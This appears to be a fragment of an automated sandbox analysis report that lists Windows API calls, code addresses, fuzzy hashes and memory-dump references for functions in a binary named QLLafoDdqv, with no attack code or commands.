              • Opcode Fuzzy Hash: 373d02fcb99c48e86bf8d21b40618f4b2438aaaa9cbbe721821abaf7dd37aecd
              • Instruction Fuzzy Hash: 06414672D0521D9EEF16EBA4D985AEE77B9AF08340F0000E6E545EB142EB38AA44CF54
              APIs
              • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00762E1C
              • GetWindowLongW.USER32(00000000,000000F0), ref: 00762E4F
              • GetWindowLongW.USER32(00000000,000000F0), ref: 00762E84
              • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00762EB6
              • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00762EE0
              • GetWindowLongW.USER32(00000000,000000F0), ref: 00762EF1
              • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00762F0B
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: LongWindow$MessageSend
              • String ID:
              • API String ID: 2178440468-0
              • Opcode ID: 7a5ad5d8c28bb9b865106da4adab3ab8c8fc295b98a752fb29028662771842c9
              • Instruction ID: b9434c6ee2478be88427f775a08e3c143a25a46c4fd52119f2fb3df546c61c9b
              • Opcode Fuzzy Hash: 7a5ad5d8c28bb9b865106da4adab3ab8c8fc295b98a752fb29028662771842c9
              • Instruction Fuzzy Hash: C23139306446409FEB61CF58DC88F6537E0FB9A710F1541A5F9529F2B2CBBAAC41DB09
              APIs
              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00737769
              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0073778F
              • SysAllocString.OLEAUT32(00000000), ref: 00737792
              • SysAllocString.OLEAUT32(?), ref: 007377B0
              • SysFreeString.OLEAUT32(?), ref: 007377B9
              • StringFromGUID2.OLE32(?,?,00000028), ref: 007377DE
              • SysAllocString.OLEAUT32(?), ref: 007377EC
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
              • String ID:
              • API String ID: 3761583154-0
              • Opcode ID: 203ff3479cfcecbc6a24dcacf9b1fa21ab4bc7a9532e15ebe7a3c5339a1714b5
              • Instruction ID: 905302cf645ea7bf19f148562bf9405b07415cf1316ca88ab69910b5868b256d
              • Opcode Fuzzy Hash: 203ff3479cfcecbc6a24dcacf9b1fa21ab4bc7a9532e15ebe7a3c5339a1714b5
              • Instruction Fuzzy Hash: 4721C4B6609219AFEF24DFA9CC88CBB77ACEB09364B008025F905DB151DAB8DC41C764
              APIs
              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00737842
              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00737868
              • SysAllocString.OLEAUT32(00000000), ref: 0073786B
              • SysAllocString.OLEAUT32 ref: 0073788C
              • SysFreeString.OLEAUT32 ref: 00737895
              • StringFromGUID2.OLE32(?,?,00000028), ref: 007378AF
              • SysAllocString.OLEAUT32(?), ref: 007378BD
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
              • String ID:
              • API String ID: 3761583154-0
              • Opcode ID: 8093e5513709c9aff3a1afb3415f77b4b5f8ede55843d04233219e39ba61d556
              • Instruction ID: e8c4cc6ed81ea05ec160518e5ebf34c4d69a3caa67b58542d631519cc673d62e
              • Opcode Fuzzy Hash: 8093e5513709c9aff3a1afb3415f77b4b5f8ede55843d04233219e39ba61d556
              • Instruction Fuzzy Hash: 3921C771605305BFEB249FA9CC88DBA77ECEB09360B108025F955DB1A1DA78DC41CB68
              APIs
              • GetStdHandle.KERNEL32(0000000C), ref: 007404F2
              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0074052E
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: CreateHandlePipe
              • String ID: nul
              • API String ID: 1424370930-2873401336
              • Opcode ID: a3b9fd20309b675d013962801efb4031f8a59f66ce1eaac0174a8aa3c32314d0
              • Instruction ID: 1ed6b0ae9746cf76329a977088bf188d6789a4ecf8eb0a35fe2322b87cdec4d2
              • Opcode Fuzzy Hash: a3b9fd20309b675d013962801efb4031f8a59f66ce1eaac0174a8aa3c32314d0
              • Instruction Fuzzy Hash: D72162755003059FDF209F29DC44E5AB7A4FF45724F204A19F9A1E72E0D7749960CFA0
              APIs
              • GetStdHandle.KERNEL32(000000F6), ref: 007405C6
              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00740601
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: CreateHandlePipe
              • String ID: nul
              • API String ID: 1424370930-2873401336
              • Opcode ID: bcd0efed980d3023c39921f52fa58164d8d19dbd06c047e5e0b18597057b5c57
              • Instruction ID: b03be76a21f565ee09cbc3a2660e6efd93a7f04d0da6d579e47c2e76eeaef315
              • Opcode Fuzzy Hash: bcd0efed980d3023c39921f52fa58164d8d19dbd06c047e5e0b18597057b5c57
              • Instruction Fuzzy Hash: 7421A3755003059FDB209F698C08A6A77E4BF85720F204A19FEA2E72D0D7B49860CB95
              APIs
                • Part of subcall function 006D600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 006D604C
                • Part of subcall function 006D600E: GetStockObject.GDI32(00000011), ref: 006D6060
                • Part of subcall function 006D600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 006D606A
              • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00764112
              • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0076411F
              • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0076412A
              • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00764139
              • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00764145
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: MessageSend$CreateObjectStockWindow
              • String ID: Msctls_Progress32
              • API String ID: 1025951953-3636473452
              • Opcode ID: 3ecfc59030ac7d15fad0aa5f2d1c86abb04ce2bb1f493cc7eba3eb5208b7fe63
              • Instruction ID: 93e9be30a6fade97cbfa1dfe121dc6c79434937424a38b0d17747306aba4796b
              • Opcode Fuzzy Hash: 3ecfc59030ac7d15fad0aa5f2d1c86abb04ce2bb1f493cc7eba3eb5208b7fe63
              • Instruction Fuzzy Hash: 2811B2B215021DBEEF119F64CC85EE77F9DEF09798F008111FB18A2150C6769C61DBA4
              APIs
                • Part of subcall function 0070D7A3: _free.LIBCMT ref: 0070D7CC
              • _free.LIBCMT ref: 0070D82D
                • Part of subcall function 007029C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0070D7D1,00000000,00000000,00000000,00000000,?,0070D7F8,00000000,00000007,00000000,?,0070DBF5,00000000), ref: 007029DE
                • Part of subcall function 007029C8: GetLastError.KERNEL32(00000000,?,0070D7D1,00000000,00000000,00000000,00000000,?,0070D7F8,00000000,00000007,00000000,?,0070DBF5,00000000,00000000), ref: 007029F0
              • _free.LIBCMT ref: 0070D838
              • _free.LIBCMT ref: 0070D843
              • _free.LIBCMT ref: 0070D897
              • _free.LIBCMT ref: 0070D8A2
              • _free.LIBCMT ref: 0070D8AD
              • _free.LIBCMT ref: 0070D8B8
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: _free$ErrorFreeHeapLast
              • String ID:
              • API String ID: 776569668-0
              • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
              • Instruction ID: 024ac15da0b9ead7d85a1111eb4275f0f5704047666e8745ef4d7d909c2409d9
              • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
              • Instruction Fuzzy Hash: 4D111F72540B04EAD531BFF4CC4FFCB7BDC6F44700F405A25B299A64E3DA69B9064A50
              APIs
              • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0073DA74
              • LoadStringW.USER32(00000000), ref: 0073DA7B
              • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0073DA91
              • LoadStringW.USER32(00000000), ref: 0073DA98
              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0073DADC
              Strings
              • %s (%d) : ==> %s: %s %s, xrefs: 0073DAB9
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: HandleLoadModuleString$Message
              • String ID: %s (%d) : ==> %s: %s %s
              • API String ID: 4072794657-3128320259
              • Opcode ID: f647ab84417c0893590261e75d3c1f7d0b3d07478031c99ad41f574c072ce597
              • Instruction ID: 0058098c906b0a97d094fa9ce3aede9b8d9f6a5691325e5b7c5e842c360f8389
              • Opcode Fuzzy Hash: f647ab84417c0893590261e75d3c1f7d0b3d07478031c99ad41f574c072ce597
              • Instruction Fuzzy Hash: 8501FFF6500308BBF7129BA49D89EF6766CE708701F408596F786E2042E6B89E844B78
              APIs
              • InterlockedExchange.KERNEL32(0173EA38,0173EA38), ref: 0074097B
              • EnterCriticalSection.KERNEL32(0173EA18,00000000), ref: 0074098D
              • TerminateThread.KERNEL32(006F0074,000001F6), ref: 0074099B
              • WaitForSingleObject.KERNEL32(006F0074,000003E8), ref: 007409A9
              • CloseHandle.KERNEL32(006F0074), ref: 007409B8
              • InterlockedExchange.KERNEL32(0173EA38,000001F6), ref: 007409C8
              • LeaveCriticalSection.KERNEL32(0173EA18), ref: 007409CF
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
              • String ID:
              • API String ID: 3495660284-0
              • Opcode ID: 29e0ea2f7e5493783159cc9e6b0c0d07287a7c6a370f32ca219b43f5a54b5196
              • Instruction ID: 85db687b73f16f64aa41c217686148b59ab7c0e1b06ea22aaf8513662847196b
              • Opcode Fuzzy Hash: 29e0ea2f7e5493783159cc9e6b0c0d07287a7c6a370f32ca219b43f5a54b5196
              • Instruction Fuzzy Hash: 24F03131442602BFD7425FA5EE9DBE67B35FF01702F405015F242608A0C7B9A465CFA4
              APIs
              • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00751DC0
              • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00751DE1
              • WSAGetLastError.WSOCK32 ref: 00751DF2
              • htons.WSOCK32(?,?,?,?,?), ref: 00751EDB
              • inet_ntoa.WSOCK32(?), ref: 00751E8C
                • Part of subcall function 007339E8: _strlen.LIBCMT ref: 007339F2
                • Part of subcall function 00753224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,0074EC0C), ref: 00753240
              • _strlen.LIBCMT ref: 00751F35
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
              • String ID:
              • API String ID: 3203458085-0
              • Opcode ID: 1dc77a46487714e80ee028425aba4bde570faed49da184eceaea87af369acbea
              • Instruction ID: 1de4affccaffc7d261ae86323e0dea41cfb4fc672c44a56443b080907fa203ed
              • Opcode Fuzzy Hash: 1dc77a46487714e80ee028425aba4bde570faed49da184eceaea87af369acbea
              • Instruction Fuzzy Hash: 89B1D030604340AFD324DF24C885F6A77E6AF84319F94894CF8565B2E2DBB5ED46CB91
              APIs
              • __allrem.LIBCMT ref: 007000BA
              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007000D6
              • __allrem.LIBCMT ref: 007000ED
              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0070010B
              • __allrem.LIBCMT ref: 00700122
              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00700140
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
              • String ID:
              • API String ID: 1992179935-0
              • Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
              • Instruction ID: f49cd91cffde22e3993c3d97fd14a2f106fb5a77b9949b683dd6bac3631d9c37
              • Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
              • Instruction Fuzzy Hash: 2E810872A01B0ADBE7209F68CC45BAE73EAAF41734F24463EF651D62C1E778D9408790
              APIs
              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,006F82D9,006F82D9,?,?,?,0070644F,00000001,00000001,8BE85006), ref: 00706258
              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0070644F,00000001,00000001,8BE85006,?,?,?), ref: 007062DE
              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 007063D8
              • __freea.LIBCMT ref: 007063E5
                • Part of subcall function 00703820: RtlAllocateHeap.NTDLL(00000000,?,007A1444,?,006EFDF5,?,?,006DA976,00000010,007A1440,006D13FC,?,006D13C6,?,006D1129), ref: 00703852
              • __freea.LIBCMT ref: 007063EE
              • __freea.LIBCMT ref: 00706413
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: ByteCharMultiWide__freea$AllocateHeap
              • String ID:
              • API String ID: 1414292761-0
              • Opcode ID: af83f7516c0654e0fecd1d957314104961cf34eb2aa30535d4abe13ed594feda
              • Instruction ID: 8b64dd50df4397370da4e6f25fc985e084d4730df93016cf20860a7b9b143cdd
              • Opcode Fuzzy Hash: af83f7516c0654e0fecd1d957314104961cf34eb2aa30535d4abe13ed594feda
              • Instruction Fuzzy Hash: EC51AF72600216EBEB258F64CC95EBFB6E9EB44754F144729F905D61C1DB38DC60C6A0
              APIs
                • Part of subcall function 006D9CB3: _wcslen.LIBCMT ref: 006D9CBD
                • Part of subcall function 0075C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0075B6AE,?,?), ref: 0075C9B5
                • Part of subcall function 0075C998: _wcslen.LIBCMT ref: 0075C9F1
                • Part of subcall function 0075C998: _wcslen.LIBCMT ref: 0075CA68
                • Part of subcall function 0075C998: _wcslen.LIBCMT ref: 0075CA9E
              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0075BCCA
              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0075BD25
              • RegCloseKey.ADVAPI32(00000000), ref: 0075BD6A
              • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0075BD99
              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0075BDF3
              • RegCloseKey.ADVAPI32(?), ref: 0075BDFF
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
              • String ID:
              • API String ID: 1120388591-0
              • Opcode ID: 72d3be956a6dcb29cf7800ed012f30b065f1ce44b8ed705b134658b1b2ea3d34
              • Instruction ID: d2654c93a04d55d8f3bc9f8b90b4b1613de51ef239718020df0784aef7d00bc5
              • Opcode Fuzzy Hash: 72d3be956a6dcb29cf7800ed012f30b065f1ce44b8ed705b134658b1b2ea3d34
              • Instruction Fuzzy Hash: 34818C30208341AFD715DF24C895E6ABBE5FF84308F14895DF8964B2A2DB75ED09CB92
              APIs
              • VariantInit.OLEAUT32(00000035), ref: 0072F7B9
              • SysAllocString.OLEAUT32(00000001), ref: 0072F860
              • VariantCopy.OLEAUT32(0072FA64,00000000), ref: 0072F889
              • VariantClear.OLEAUT32(0072FA64), ref: 0072F8AD
              • VariantCopy.OLEAUT32(0072FA64,00000000), ref: 0072F8B1
              • VariantClear.OLEAUT32(?), ref: 0072F8BB
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Variant$ClearCopy$AllocInitString
              • String ID:
              • API String ID: 3859894641-0
              • Opcode ID: cfb57628a9fb640819e94aa3dd7481cb340a5377d92fa589116c5c90239ff6bc
              • Instruction ID: 3fa2ff2b4617be4cf224a4d7478e514ae739d5d5904191b57e8f6754f3a75f48
              • Opcode Fuzzy Hash: cfb57628a9fb640819e94aa3dd7481cb340a5377d92fa589116c5c90239ff6bc
              • Instruction Fuzzy Hash: BB51D631501320FBCF10AB65E895B39B7B5EF45310B20947BE846DF295DB789C80CB6A
              APIs
                • Part of subcall function 006D7620: _wcslen.LIBCMT ref: 006D7625
                • Part of subcall function 006D6B57: _wcslen.LIBCMT ref: 006D6B6A
              • GetOpenFileNameW.COMDLG32(00000058), ref: 007494E5
              • _wcslen.LIBCMT ref: 00749506
              • _wcslen.LIBCMT ref: 0074952D
              • GetSaveFileNameW.COMDLG32(00000058), ref: 00749585
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: _wcslen$FileName$OpenSave
              • String ID: X
              • API String ID: 83654149-3081909835
              • Opcode ID: 8689acf0d6bac31f38d9da69065c90ae8cf3804fd9597974857a7527f00f3229
              • Instruction ID: 850dce11c78de4b7de1c64a23cf7f15604053cf3f47aa04a0c535898a727285d
              • Opcode Fuzzy Hash: 8689acf0d6bac31f38d9da69065c90ae8cf3804fd9597974857a7527f00f3229
              • Instruction Fuzzy Hash: CDE1AE31A083409FC764DF24C881A6BB7E1BF85314F14896DF9899B3A2EB35DD05CB96
              APIs
                • Part of subcall function 006E9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 006E9BB2
              • BeginPaint.USER32(?,?,?), ref: 006E9241
              • GetWindowRect.USER32(?,?), ref: 006E92A5
              • ScreenToClient.USER32(?,?), ref: 006E92C2
              • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 006E92D3
              • EndPaint.USER32(?,?,?,?,?), ref: 006E9321
              • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 007271EA
                • Part of subcall function 006E9339: BeginPath.GDI32(00000000), ref: 006E9357
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
              • String ID:
              • API String ID: 3050599898-0
              • Opcode ID: 38ea0b68587e41847d58a21dbd254755bf241000b0f46e1f5c7ee1a16015cdea
              • Instruction ID: 406f56c88ab487128e234f3c1157ec71c64a1cf9239508a59b34d8c4eb5b0573
              • Opcode Fuzzy Hash: 38ea0b68587e41847d58a21dbd254755bf241000b0f46e1f5c7ee1a16015cdea
              • Instruction Fuzzy Hash: 7941E030105340AFE711DF25DC84FBB7BA9EF86320F104229FAA5872E1C774A845DB66
